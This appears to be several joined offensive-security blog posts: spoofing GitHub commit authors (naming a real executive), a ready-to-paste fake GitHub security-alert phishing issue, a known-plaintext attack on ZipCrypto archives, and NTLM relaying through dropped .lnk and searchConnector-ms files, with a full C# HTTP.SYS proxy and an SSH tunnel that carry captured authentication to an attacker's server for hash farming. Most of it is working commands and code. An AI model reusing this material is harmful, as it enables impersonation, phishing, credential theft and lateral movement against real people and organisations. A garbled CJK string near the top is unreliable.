Details

Sometimes you see something and think: “Hey that would make a happy little joke to play with” and then some idea is stuck to your head. This is a little wannabe-funny hoax for security people and the hate we probably all have for “something”.

Don’t take it too serious. Never touch a running system! Just a little hoax for my fellow security dudes and dudettes.

Yeah I know, you don’t want to read this, so here, straight to the PoC.

Do as you wish

“桳睯猠浯扥摯⁹⁡畱捩整浲湩污愠摮琠敨潣瑮湩敵”

Details

…

<!DOCTYPE html>

TL;DR: On Github it is possible to:

• Spoof Commit authors
• Spoof Contributors
• Host hidden payloads under github.com (mostly solved)
• Use Issues for phishing

Having fun with Github

Github is somehow the leading platform for code storage. But did you know that protections against impersonation are not that strong? I expect this functions are “by-design” and “working as intendend” it’s just that combining some of them might cause some risk.

Let’s jump into some “special” behavior. I tend to call it “with room for improvement”.

Spoof Commit Authors

We can spoof users on Github as long as we know the username and the email. Let’s demonstrate this. Put on your protection and follow me.

Finding a “victim”

At first, we need somebody we want to spoof. Let’s just take the CEO of Github, Thomas Dohmke. Nothing personal here, just fits the platform.

Always go big, target the CEO

So we need to find the Github profile, which was quite easy, as it is shown in the bottom left corner.

@ashtom is the profile. The next step is to find a commit from that person, which can be easily done via the “Contribution activity”.

Contribution activity

Open the commit details for a real commit, not a merge pull request like https://github.com/ashtom/hkimport/commit/e2a386c0f2fe4b8ec939eb132b5532c0396c9133.

Add a .patch to the URL to see the real git patch message:
https://github.com/ashtom/hkimport/commit/e2a386c0f2fe4b8ec939eb132b5532c0396c9133.patch

Getting the username and the e-mail

Here we have our needed user.name Thomas Dohmke and the user.email thomas@dohmke.de. Wondering why it’s written like that? We will see shortly.

Spoof some commits

Create a new repository and check it out via the git CLI.

You will need a Github Token for that, which you can generate under Developer Settings.

Now we make some nice commits and push them with another user.name.

user@localhost ~/must-be-legit (main)> git config user.name Thomas Dohmke
user@localhost ~/must-be-legit (main)> git config user.email thomas@dohmke.de
user@localhost ~/must-be-legit (main)> code -n .
user@localhost ~/must-be-legit (main)> git add *
user@localhost ~/must-be-legit (main)> git commit -m "Hello from Thomas"
[main (root-commit) 9d6c889] Hello from Thomas
 2 files changed, 1 insertion(+)
 create mode 100644 README.MD
 create mode 100644 image.png
user@localhost ~/must-be-legit (main)> git push
Username for 'https://github.com': <<myemail>>
Password for 'https://<<myemail>>@github.com': 
Enumerating objects: 4, done.
Counting objects: 100% (4/4), done.
Delta compression using up to 4 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (4/4), 308.67 KiB | 17.15 MiB/s, done.
Total 4 (delta 0), reused 0 (delta 0), pack-reused 0
To https://github.com/PfiatDe/must-be-legit.git
 * [new branch]      main -> main

Note that the username for the commit was different from the one for the push.

And now, yeah, nothing. That’s all. You successfully spoofed a commit message. Spoofed commit

Spoofed commit

The Github user profile is linked with the commit user.email and therefore looks very valid and also links in the profile are working, as it’s the real user profile.

Connected User profile

Not that bad, right?

Looking at the repo insights, we also see our contributor.

Repository insights

However, there is still some discrepancy, which you might have noticed, the contributor did not show up on the repository main page.

Let’s tackle this.

Get Contributors shown

Actually, that’s quite easy. Looking at: Why are my contributions not showing up on my profile? we find several actions which might add the contributors.

We are going for a Pull Request, as we cannot create issues directly in the git CLI.

But WAIT

I was playing around with this when suddenly I realized it is way simpler. Just set the repository to public before you commit & push and you get your contributors badge.

Contributors

You can change the repository settings after your commit again.

Unverified commit status

If we look at the commit history, there is a status showing if the commit could be verified and bound to the user.

Unverified status

For some spoofed users, we see an unpleasant Unverified status.
This happens when the user has the vigilant mode enabled (Learn about vigilant mode) and commits must be signed. One might argue that this warning has poor visibility. However, it is there…

Let’s see if we can get rid of it. Luckily we can use another feature of Github, Co-authored-by in that case. This is even easier to use. So let’s do this:

• Use the WebUI and create a commit.
• Add an extended description.
• Done.

Co-authored-by feature

The commit is now from two people, where one could be verified and therefore it is partially verified.

“Helpful” status popup

So we can get a partially verified which is green:

What’s also interesting is that Github does not state what’s wrong with the commit and even in the detailed view it is not possible to see.

And to stress this a little bit, the vigilant mode is not that far in use. So if we look at the current Github Chief of Staff, Demetris Cheatham, we see that even the C-Level of Github itself hasn’t enabled it for all board members.

Note: We can even get a verified status with the Co-Authored technique.

Committed with the Github Chief of Staff

Conclusion for the spoofing

It is really easy to spoof other Github users in the commits. We must decide if we want either the commit author directly spoofed, which might bring up an Unverified status if the user is using the vigilant mode. Or we use the Co-authored-by flag to get the Partially verified and a better visibility for our spoofed author. There are even some ready to use memes around:

https://www.reddit.com/r/ProgrammerHumor/comments/1jaldin/gitpush/

You also might find a clever way to combine them :)

Host payloads under other repos

Until somewhere in 2024 it was possible to host payloads in issues for other repositories. You can check e.g. the following report for details:

https://research.openanalysis.net/github/lua/2024/03/03/lua-malware.html

https://x.com/JustasMasiulis/status/1764171634469122165

After some malicious campaigns using this, Github finally fixed it after several months and now temporary uploads are hosted under some user folder now:
[copilot-language-server.zip](https://github.com/user-attachments/files/19891659/copilot-language-server-darwin-arm64-1.306.0.zip).
So, this still works, but isn’t that great anymore.

Note: The file is getting deleted if there is no reference to it, e.g. in an issue. So it is not available anymore.

What is particularly interesting is that the file seems to get incremented, which might allow brute-forcing some of them.

Incremented ID for the upload

Letting a Burp eat some RAM this quite quickly revealed a 302 response.

Intruder Attack

Note: This is done unauthenticated! The session ID is not connected to an account. Also note: There are some brute-force protections in place, but yeah, they are not bulletproof.

Following the redirect brings us some files which are not ours.

Get some uploaded files

But this is only for public files, so it’s kinda boring!

Host under Tickets

Another approach is to host the file at a ticket.

Go to: Account –> Github Support –> My Tickets –> New Ticket –> open a support ticket to create a new service ticket.

Upload your file and it will be available under a Zendesk URL https://github.zendesk.com/attachments.

For example:

https://github.zendesk.com/attachments/token/jwxXlXEbwo0IJFzrhy1OVPkEZ/?name=copilot-language-server-darwin-arm64-1.306.0.zip

No need to finally send the ticket, but the file is getting deleted after some hours if not. Okay, to be fair, this is not hosting the file under the github.com domain anymore, but at least it is kind of worthless :)

Conclusion

So this seems to be quite good solved by Github finally. You can ofc still host your files in a public repo or in a gist but that is kind of lame.

Use issues for phishing

If we drop somebody an issue in their repository, typically an e-mail will be sent to the owner.

The most interesting part for sure is the possibility to insert links.

Somebody might choose a nice Github name and set the display name and a fitting profile picture.

The display name of the profile will be the from field, which is … interesting.

Phishing Mail with a link

The HTML which will be sent via e-mail notification is quite limited, however, it might be possible to craft something. We can use Headlines and basic stuff like bold, italic. The use of colors is restricted and not trivial to escape.

There are several samples around how an issue might look like, e.g. here: https://www.bleepingcomputer.com/news/security/fake-security-alert-issues-on-github-use-oauth-app-to-hijack-accounts/

# Security Alert: Login Blocked
Your GitHub account was successfully signed in to but we did not recognize the location of the sign-in. You can review this sign-in attempt by visiting [https://github.com/settings/sessions/authentications/4102671234](https://github.com/settings/sessions/authentications/4102671234)

## Login Information
* 🏠 Location: Wolgograd, Russia 🇷🇺
* 🖧 IP Address: 102.222.77.66
* 💻 Device: Chrome on Red Hat Linux

If you recently signed in to your account, you do not need to take any further action.

If you did not sign in to your account, your password may be compromised. 

## Steps to secure your Account
Visit [https://github.com/settings/security](https://github.com/settings/security) to create a new, strong password for your GitHub account.

For more information, see [https://docs.github.com/articles/keeping-your-account-and-data-secure/](https://docs.github.com/articles/keeping-your-account-and-data-secure/) in the GitHub Docs.

To see this and other security events for your account, visit [https://github.com/settings/security-log](https://github.com/settings/security-log)


Thanks,
The GitHub Team

This is how some example might look like: Phishing Mail with a link

We can edit the issue after a few seconds.

Cleanup

And then delete the history: Cleanup

Bonus: Colors in online issues

We can get some colors for the rendered online version of the github issues. This is rather funny than useful, as Github will not generate the HTML for the Code Block and therefore it will land as text in the email. So this only works for the online rendered version.

## By using LaTeX Macros we can get colored Text

$${\color{red}Welcome \space \color{lightblue}To \space \color{orange}My \space \color{green} \Huge{\textsf{Site}}}$$

${{\color{Goldenrod}\Huge{\textsf{Some\ more\ Text\ }}}}$

${{\color{blue}\Huge{\textsf{Lorem\ ...}}}}$

Phishing Mail with a link

But ofc you can also just make an image or embedd an svg, which is also fine and offers some more room for design.

Links

• https://www.bleepingcomputer.com/news/security/fake-security-alert-issues-on-github-use-oauth-app-to-hijack-accounts/
• https://research.openanalysis.net/github/lua/2024/03/03/lua-malware.html

“It’s amazing what the ransomware operators know about cryptography…”

TL;DR:

• Find an encrypted ZIP
• Hope that it is not AES encrypted
• Get one of the files from the ZIP as plaintext from the internet or other sources
• Profit!

Details

Maybe at some point, after hours of digging on network shares or buckets, you encountered that one ZIP file that looked juicy, and you were ready to open it. You set up the VM without internet access to avoid the honeycred/files/tokens, clicked on the file with the .config, and then…

Stupid Password Prompt

Don’t you hate it when that happens?

A stupid password??? …

But there are some good chances to get around this, as the underlying zipCrypto has some attack vectors.

Time to have some “fun” :)

The first try would be just to crack the password, as quite often they are really weak.

To demonstrate this, I took some random file from Malware Bazaar.

Our sample zip

Just kidding, be careful out there

Plan A - Standard - Crack it

John the Ripper has a nice zip2john module for it.

So we build a hash over the zip:

user@localhost ~/zip> john/run/zip2john  18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip > zip.hash
ver 2.0 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip/Launcher/ is not encrypted, or stored with non-handled compression type
ver 2.0 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip/Launcher/ActiveSyncProvider.dll PKZIP Encr: cmplen=719649, decmplen=1707520, crc=10BE1B90 ts=06E9 cs=10be type=8
[...]
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

Paste or redirect in a text file and we will see that a strong password is in use…

Yeah, we want some passwords

user@localhost ~/zip> /opt/john/run/john zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Note: Passwords longer than 21 [worst case UTF-8] to 63 [ASCII] rejected
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
0g 0:00:00:00 DONE 1/3 (2025-04-03 20:49) 0g/s 1021Kp/s 1021Kc/s 1021KC/s Demuxmgr1900..Zip1900
Proceeding with wordlist:/opt/john/run/password.lst
Enabling duplicate candidate password suppressor
2025             (18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip)     
1g 0:00:00:00 DONE 2/3 (2025-04-03 20:49) 4.000g/s 851300p/s 851300c/s 851300C/s navy123..kyle24
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Great plan

Ooooookay 2025, that was a crazy password. For the sake of the more interesting part of the blog, we just ignore this for a moment.

Plan B - The cool one - Known Plaintext attack

Cracking is always nice, but the more interesting attack is a plaintext attack against the archive. Some nice details about our attack against the zipcrypto can be found here: https://wiki.anter.dev/misc/plaintext-attack-zipcrypto/

First we want to know, what we have to deal with.

user@localhost ~/zip> unzip -vv 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip 
Archive:  18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip
 Length   Method    Size  Cmpr    Date    Time   CRC-32   Name
--------  ------  ------- ---- ---------- ----- --------  ----
       0  Stored        0   0% 2025-03-28 21:26 00000000  Launcher/
 1707520  Defl:N   719637  58% 2025-02-24 00:55 10be1b90  Launcher/ActiveSyncProvider.dll
       0  Stored        0   0% 2025-03-28 20:49 00000000  Launcher/com/
   81920  Defl:N    33934  59% 2023-12-04 10:46 c7484291  Launcher/com/AcSpecfc.dll
  168448  Defl:N    75753  55% 2025-02-24 00:53 2bf4bfd8  Launcher/com/AdvancedEmojiDS.dll
       0  Stored        0   0% 2025-03-28 20:49 00000000  Launcher/data/
   26112  Defl:N    10754  59% 2019-12-07 17:08 cd285dbe  Launcher/data/AJRouter.dll
 1722096  Defl:N   513132  70% 2022-12-23 23:02 161941c4  Launcher/data/alibabacloud-oss-cpp-sdk.dll
       0  Stored        0   0% 2024-05-19 02:26 00000000  Launcher/data/changelog.txt
    3245  Defl:N     1344  59% 2024-12-04 13:24 6df9108a  Launcher/data/COPYRIGHT
  163568  Defl:N    55942  66% 2022-12-23 23:02 720eae83  Launcher/data/cpr.dll
[...]
--------          -------  ---                            -------
767295036         58901308  92%                            33 files

Defl:N is a good hint, that we need to deal with Deflate mode of zips, which is not great but okay. There are several modes for ZIP files. Text is from the 7z help and superuser forum:

Method Description

LZMA
    It's base compression method for 7z format. Even old versions of 7-Zip can decompress archives created with LZMA method. It provides high compression ratio and very fast decompression.
LZMA2
    Default compression method of 7z format. LZMA2 is LZMA-based compression method. It provides better multithreading support than LZMA. But compression ratio can be worse in some cases. For best compression ratio with LZMA2 use 1 or 2 CPU threads. If you use LZMA2 with more than 2 threads, 7-zip splits data to chunks and compresses these chunks independently (2 threads per each chunk).
PPMd
    Dmitry Shkarin's PPMdH algorithm with small changes. Usually it provides high compression ratio and high speed for text files.
BZip2
    Standard compression method based on BWT algorithm. Usually it provides high speed and pretty good compression ratio for text files.
Deflate
    Standard compression method of ZIP and GZip formats. Compression ratio is not too high. But it provides pretty fast compressing and decompressing. Deflate method supports only 32 KB dictionary.
Deflate64
    Modified version of Deflate algorithm with bigger dictionary (64KB).

Deflate is the most common method, as it is the standard for 7z and others.

zipinfo would provide even more information about the zip if needed.

user@localhost ~/zip> zipinfo -v 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip 
Archive:  18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip
There is no zipfile comment.

[...]
Central directory entry #2:
---------------------------

  There are an extra -36 bytes preceding this file.

  Launcher/ActiveSyncProvider.dll

  offset of local header from start of archive:   39
                                                  (0000000000000027h) bytes
  file system or operating system of origin:      MS-DOS, OS/2 or NT FAT
  version of encoding software:                   6.3
  minimum file system compatibility required:     MS-DOS, OS/2 or NT FAT
  minimum software version required to extract:   2.0
  compression method:                             deflated
  compression sub-type (deflation):               normal
  file security status:                           encrypted
  extended local header:                          no
  file last modified on (DOS date/time):          2025 Feb 24 00:55:18
  32-bit CRC value (hex):                         10be1b90
  compressed size:                                719649 bytes
  uncompressed size:                              1707520 bytes
  length of filename:                             31 characters
  length of extra field:                          36 bytes
  length of file comment:                         0 characters
  disk number on which file begins:               disk 1
  apparent file type:                             binary
  non-MSDOS external file attributes:             000000 hex
  MS-DOS file attributes (20 hex):                arc 
[...]

So what do we need now? We need one exactly same file as provided within the zip file. As we can read the size and the name this is a job for the internet!

Going to a lovely place

I went for the AJRouter.dll, other files might work as well.

26112  Defl:N    10754  59% 2019-12-07 17:08 cd285dbe  Launcher/data/AJRouter.dll

Success rate was quite good for dll files or files with rather unique names like msg_26.txt and a very specific size.

Several options to look for files:

• GrayHatWarfare is great for this, you can even provide the exact size

GrayHatWarfare is doing great for that

• Other options might be GoogleFu, Dllme.com, opendll.com, Github or a Windows System, especially if you are looking for .Net Framework files.

Sniffing around

As we can see, we found at least a file with the same size.

Remember that files can be different, even if they have the same size, so if the attack is failing try different files.

user@localhost ~/zip> ls -al
total 57572
drwxr-xr-x  3 user user     4096 Apr  2 21:26 ./
drwx------ 39 user user     4096 Apr  2 20:47 ../
-rw-r--r--  1 user user 58907190 Apr  1 21:07 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip
-rw-r--r--  1 user user    26112 Apr  2 21:18 AJRouter.dll
drwxr-xr-x 12 user user     4096 Mar 27 20:49 bkcrack/

So nice, we found our plaintext file. Now as Deflate was the method in use, we need to make a file with several compressions (-mx for 7z). The Range is from 0-9 in that case. So a quick&dirty oneliner will make all zip files for us.

user@localhost ~/zip> seq 0 10 | xargs -i 7z a -mm=Deflate -mx{} plain{}.zip /home/user/zip/AJRouter.dll

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs 13th Gen Intel(R) Core(TM) i7-13700H (B06A2),ASM,AES-NI)

Scanning the drive:
1 file, 26112 bytes (26 KiB)

Creating archive: plain0.zip

Items to compress: 1

    
Files read from disk: 1
Archive size: 11438 bytes (12 KiB)
Everything is Ok
[...]

Now we have several zip files with different compressions.

Finally, we can use bkcrack to run our plaintext attack.

Crack legacy zip encryption with Biham and Kocher’s known plaintext attack.

So we need to provide:

• -P our create Zip file
• -p plaintext file in our zip
• -C the zip we want to attack
• -c path to the file we have the plaintext to

Go go go

user@localhost ~/zip> ls plain*.zip | xargs -i -t  ~/zip/bkcrack/install/bkcrack -P {} -p AJRouter.dll -C 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip -c "Launcher/data/AJRouter.dll"

/home/user/zip/bkcrack/install/bkcrack -P plain0.zip -p AJRouter.dll -C 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip -c Launcher/data/AJRouter.dll
bkcrack 1.7.1 - 2024-12-21
Data error: ciphertext is smaller than plaintext.

/home/user/zip/bkcrack/install/bkcrack -P plain10.zip -p AJRouter.dll -C 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip -c Launcher/data/AJRouter.dll
bkcrack 1.7.1 - 2024-12-21
[21:30:15] Z reduction using 10635 bytes of known plaintext
64.3 % (6841 / 10635)
[21:30:16] Attack on 193 Z values at index 4571
100.0 % (193 / 193)
[21:30:16] Could not find the keys.

/home/user/zip/bkcrack/install/bkcrack -P plain1.zip -p AJRouter.dll -C 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip -c Launcher/data/AJRouter.dll
bkcrack 1.7.1 - 2024-12-21
Data error: ciphertext is smaller than plaintext.

[...]

/home/user/zip/bkcrack/install/bkcrack -P plain5.zip -p AJRouter.dll -C 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip -c Launcher/data/AJRouter.dll
bkcrack 1.7.1 - 2024-12-21
[21:30:16] Z reduction using 10747 bytes of known plaintext
84.9 % (9120 / 10747)
[21:30:17] Attack on 256 Z values at index 2656
Keys: 4ba31d26 7d9a4839 a4864fa0
70.3 % (180 / 256)
Found a solution. Stopping.
You may resume the attack with the option: --continue-attack 180
[21:30:17] Keys
4ba31d26 7d9a4839 a4864fa0
[...]

As we can see, with compression 5 we get some keys. This is not surprising, as 5 is the default, but it’s always good to test all compressions and we are talking about seconds for this kind of attack.

I really want to point this out, the run takes seconds to finish (if your plaintext file has a decent size)

________________________________________________________
Executed in    7.75 secs    fish           external
   usr time   13.78 secs    1.77 millis   13.78 secs
   sys time    0.07 secs    1.30 millis    0.06 secs

Next step is to use the keys to rewrite the ZIP without a password.

user@localhost ~/zip [1]> ~/zip/bkcrack/install/bkcrack -C 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip -D withoutpw.zip -k 4ba31d26 7d9a4839 a4864fa0
bkcrack 1.7.1 - 2024-12-21
[21:32:27] Writing decrypted archive withoutpw.zip
100.0 % (27 / 27)

That’s it, now we have an unprotected ZIP file where we can access all the files and juicy secrets within.

user@localhost ~/zip> unzip -v -p withoutpw.zip Launcher/data/COPYRIGHT | head
Copyright © 1993, 2025, Oracle and/or its affiliates.
All rights reserved.

This software and related documentation are provided under a
license agreement containing restrictions on use and
disclosure and are protected by intellectual property laws.
Except as expressly permitted in your license agreement or
allowed by law, you may not use, copy, reproduce, translate,
broadcast, modify, license, transmit, distribute, exhibit,
perform, publish, or display any part, in any form, or by

Taking all the little secrets

Despite the fact, that the password in this case was super easy, it does not matter. The password of the ZIP has no influence on the derivated keys and therefore the plaintext attack. It could even be “Sup3rS3cr3t!” which John would never ever crack!!!

Bonus

If you have a lot of ZIPs and want to check which one have a password protection, which is ofc a strong indicator for some nice little secrets inside, the following OneLiner was handy.

ls *.zip | xargs -i -t bash -c 'zipinfo -v {} | grep -ic "  encrypted"'

Links

• https://medium.com/@whickey000/how-i-cracked-conti-ransomware-groups-leaked-source-code-zip-file-e15d54663a8
• https://wiki.anter.dev/misc/plaintext-attack-zipcrypto/

• Coerce User Authentication via NetNTLM and a file drop
• The mystery around HTTP.SYS
• Relaying without admin privileges
• Relaying with an active Windows firewall
• SSH Port forwarding

Details

Coerce User Authentication via NetNTLM

A detail from a SO-CON 2024 slidedeck took my attention. (Net)NTLM relaying is still alive?

The PDF can be found here: Elad Shamir - NTLM The Legacy Protocol That Won’t Die / Elad Shamir - NTLM - SO-CON 2024.pdf

So, what does this mean? If an attacker can drop a hidden authentication coercion file, which is a wonderful way to describe for example a .lnk or a .scf file, to a user desktop it will trigger an auth. Even without user interaction, as it typically is for network shares? - Nice

This could be a nice way for lateral movement, but of course requires local administrative permissions, or a really broken client (yeah, I know, happens way too often …).

A buddy at work (@qtc_de) had a nice little tip for me, when we were talking about possibilities. Instead of dropping files on each user’s desktop, we can just drop one in Users\Public\Public Desktop and it will immediately be synchronized to all desktops.

Of course there are already some great writeups about this:

• https://0xdf.gitlab.io/2019/03/09/htb-ethereal.html#visual-studio-2017lnk

• https://0xdf.gitlab.io/2019/06/01/htb-sizzle.html#creds-for-amanda

For the coercion part itself, we are going to generate an overly complex lnk file with the icon pointing to a WebDAV resource.
For example, NetExec has a module slinky for it, which just needs some minor adjustment.

The relevant part of it:

link = pylnk3.create(self.lnk_path)
link.icon = f"\\\\{self.server}\\icons\\icon.ico"
link.save()

We need an icon path like this:

\\elastic-elastic-dc01\apps\icon.ico

With the lnk dropped to the Public Desktop we can trigger an authentication on Port 445 (SMB), which we can farm or relay. However, SMB relaying is not that useful anymore, as most environments have SMB signing enforced. There are of course some exclusions, ESC8 is still doing great!

PS: The lnk File can also be invisible :)

There are some really great maps at https://www.thehacker.recipes/a-d/movement/ntlm/relay:

Source: https://www.thehacker.recipes/a-d/movement/ntlm/relay

So what can we do to increase the impact of the relaying part?

WebClient

If the WebClient is started on a client, we can trigger a coercion via HTTP (WebDAV in this case) to any port and path we want to!
If you need to refresh your knowledge about that topic look e.g. here.

The risk that the webclient is not started is uncomfortable, so we just start it ourselves, also by dropping a file. This time we need a .searchConnector-ms file. Yeah, that’s a weird filetype…

example searchConnector-ms file

Yeah I honor your time, so here is the content for Copy&Paste.

<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
    <description>Microsoft Outlook</description>
    <isSearchOnlyItem>false</isSearchOnlyItem>
    <includeInStartMenuScope>true</includeInStartMenuScope>
    <templateInfo>
        <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
    </templateInfo>
    <simpleLocation>
        <url>https://whatever/</url>
    </simpleLocation>
</searchConnectorDescription>

Dropping this file will start the WebClient service on a client.
Note that the WebClient is mostly available under Windows 10 & 11, Windows Server needs an additional role installed to have it

We now adjust our .lnk file to point to a specific port (10247) by adding @10247.

\\elastic-elastic-dc01@10247\apps\icon.ico

Now, if we have code execution on a Linux box without a firewall we can simply use this. But we want to go a little bit further and exploit this with an active Windows firewall and without admin permissions.

Break the firewall

In Windows there is another way to create a webserver than a classic socket listener. Windows does include a Driver, which does the heavy lifting for us and allows quite simple web applications.

Source: https://www.codeproject.com/Articles/437733/Demystify-http-sys-with-HttpSysManager

As we all have only limited time, here is the short version.

The .Net Namespace around this is the System.Net.HttpListener and there is a Kernel driver doing things for us.

As it is nice to have a driver do some stuff for us, the bigger benefits are:

• We can have webserver without admin privileges
• We can have webserver with an active Windows Firewall

Wait, what? -Correct, there are some paths, which are allowed through the default configuration of the Windows Firewall, as the HTTP.SYS driver is running under NT-SYSTEM and it is a trusted application!

Mild shock

The following blog brings some light to it: https://www.codeproject.com/Articles/437733/Demystify-http-sys-with-HttpSysManager

Unfortunately, the code project is gone :’(

• But wait, aren’t we Hackers? So we use Wayback machine!

https://web.archive.org/web/20210629141743/https://archive.codeplex.com/?p=httpsysmanager

Luckily the release was also archived.

This allows us to use this wonderful tool, without writing all those nasty lines of code by ourselves.

HTTP.SYS ACL’s

Let’s take a look at a Windows 11 System: Checking the HTTP.SYS ACLs on a Windows 11

If we check all those permissions for the URI, we find some interesting ones, like

Lax permissions on the :10247/apps path

Authenticated users? Hey that’s me!

So every authenticated user can register a listener under http://<HOST>:10247/apps? Nice, let’s try this.

Running a listener without admin privileges

And as a bonus, this also bypasses the default configuration of the windows firewall! - Cool

Totally fine

Other interesting URI’s are:

• http://*:5357/
• http://*:10246/MDEServer/
• http://*:10247/apps/
• http://*:80/Temporary_Listen_Addresses/
• http://*:5358/

Note: Not all those URIs are also allowed through the firewall!

Proxying

So we can have a listener without admin privs and through an active windows firewall. So what’s next? We can proxy those requests and do something else with them.

There is a useful code snippet on LinkedIn (yeah, I know …):

https://www.linkedin.com/pulse/implementing-proxy-server-c-example-test-case-esmael-esmaeli/

This snippet needs some adjustments to fit our needs. We might come up with something quick&dirty like this

using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Net;
using System.Runtime.Remoting.Messaging;
using System.Text;
using System.Threading.Tasks;

namespace Proxy
{
    internal class Program
    {
        static void Main(string[] args)
        {
            // Create a new HttpListener to listen for requests on the specified UR
            HttpListener listener = new HttpListener();
            listener.Prefixes.Add("http://+:80/Temporary_Listen_Addresses/");
            //listener.Prefixes.Add("http://+:5357/blub/");
            //listener.Prefixes.Add("http://+:5358/blubber/123/");
            listener.Prefixes.Add("http://+:10246/MDEServer/");
            listener.Prefixes.Add("http://+:10247/apps/");
            listener.AuthenticationSchemes = AuthenticationSchemes.Anonymous;
            listener.IgnoreWriteExceptions = true;  
            
            listener.Start();

            while (true)
            {
                try
                {
                    // Wait for a request to be made to the server
                    HttpListenerContext context = listener.GetContext();

                    // Get the request and response objects
                    HttpListenerRequest request = context.Request;
                    HttpListenerResponse response = context.Response;

                    // Modify the request as needed (e.g. to add headers, change the URL, etc.)
                    string newUrl = "http://elastic-elastic-dc01:8080/icon.ico";

                    // Forward the request to the destination server
                    HttpWebRequest destinationRequest = (HttpWebRequest)WebRequest.Create(newUrl);
                    destinationRequest.SendChunked = false;
                    destinationRequest.Method = request.HttpMethod;

                    // Copy the request headers from the original request to the new request
                    Console.WriteLine("Request");
                    Console.WriteLine(request.Url.ToString());
                    Console.WriteLine(request.HttpMethod.ToString());
                    Console.WriteLine(request.Headers.ToString());
                    foreach (string key in request.Headers.AllKeys)
                    {
                        try
                        {
                            string[] values = request.Headers.GetValues(key);
                            switch (key)
                            {
                                case "Connection":
                                    if (values[0] == "Keep-Alive") 
                                    { 
                                        destinationRequest.KeepAlive = true; 
                                    } else
                                    {
                                        destinationRequest.Connection = values[0];
                                    }                                   
                                    break;
                                case "Content-Length":
                                    destinationRequest.ContentLength = long.Parse(values[0]);
                                    break;
                                case "Host":
                                    destinationRequest.Host = values[0];
                                    break;
                                case "User-Agent":
                                    destinationRequest.UserAgent = values[0];
                                    break;
                                default:
                                    destinationRequest.Headers.Add(key, values[0].ToString());
                                    break;
                            }
                        }
                        catch (Exception ex)
                        {
                            Console.WriteLine(ex.ToString());
                        }
                    }
                    Console.WriteLine("Forwarded item");
                    Console.WriteLine(destinationRequest.RequestUri.ToString());
                    Console.WriteLine(destinationRequest.Host);
                    Console.WriteLine(destinationRequest.Headers.ToString());

                    HttpWebResponse destinationResponse;
                    // Get the response from the destination server
                    try
                    {
                        destinationResponse = (HttpWebResponse)destinationRequest.GetResponse();
                    }
                    catch (WebException wex)
                    {
                        destinationResponse = wex.Response as HttpWebResponse;
                    }

                    Console.WriteLine("Response");
                    Console.WriteLine(destinationResponse.StatusCode.ToString());
                    Console.WriteLine(destinationResponse.Headers.ToString());

                    response.StatusCode = (int)destinationResponse.StatusCode;    
                    // Copy the response headers from the destination response to the client response
                    foreach (string key in destinationResponse.Headers.AllKeys)
                    {
                        //response.Headers[header] = destinationResponse.Headers[header];
                        string[] values = destinationResponse.Headers.GetValues(key);
                        if (key == "Content-Length")
                        {
                            ;
                        }
                        else
                        {
                            response.AddHeader(key, values[0]);
                        }
                    }
                    Console.WriteLine("Response - Override");
                    Console.WriteLine(destinationResponse.StatusCode.ToString());
                    Console.WriteLine(destinationResponse.Headers.ToString());
                    response.SendChunked = false;
                   
                    // Get the response stream from the destination response and copy it to the client response
                    using (Stream destinationStream = destinationResponse.GetResponseStream())
                    {
                        using (Stream outputStream = response.OutputStream)
                        {
                            destinationStream.CopyTo(outputStream);
                            outputStream.Flush();
                            // You must close the output stream.
                            outputStream.Close();
                        }
                    }
                }
                catch (Exception ex)
                {
                    Console.Write(ex.ToString());
                    Console.WriteLine(ex.StackTrace.ToString());
                }
            }
            listener.Stop();
        }
    }
}

What is this doing? A ton of debug outputs, some bad practice, and some minor functions like registering a listener for HTTP.SYS, forward the request to another port, get the response and then deliver the response to the initial caller.

So what can we do with this? We can combine it with an old friend!

Old friend for the rescue

Note: SSH is only an easy option. There are way better possibilities like using ironpython, python.net or do the relaying directly in C#.

Good ol’ SSH

We can dome some nice little port forwarding on the same machine to tunnel the traffic to a system we fully control and then send it back.

ssh -L 10.3.10.12:8080:10.3.10.11:80 -R 127.0.0.1:9050 debian@10.3.10.11

Why is this useful? As Windows also offers native SSH capabilities, we can use the standard windows client for SSH port forwarding to a server in the internet (-L 10.3.10.12:8080:10.3.10.11:80), have ntlmrelayx running there and tunnel the traffic back via a SOCKS (-R 127.0.0.1:9050).
Note: the target server does not need to be in the same network if SSH outgoing is allowed, meaning it can be a VPS or whatever

Farm NetNTLM Hashes

By proxying the request and using SSH Port forwarding, we can e.g. run responder on the VPS to get some hashes.

Farming some hashes for cracking

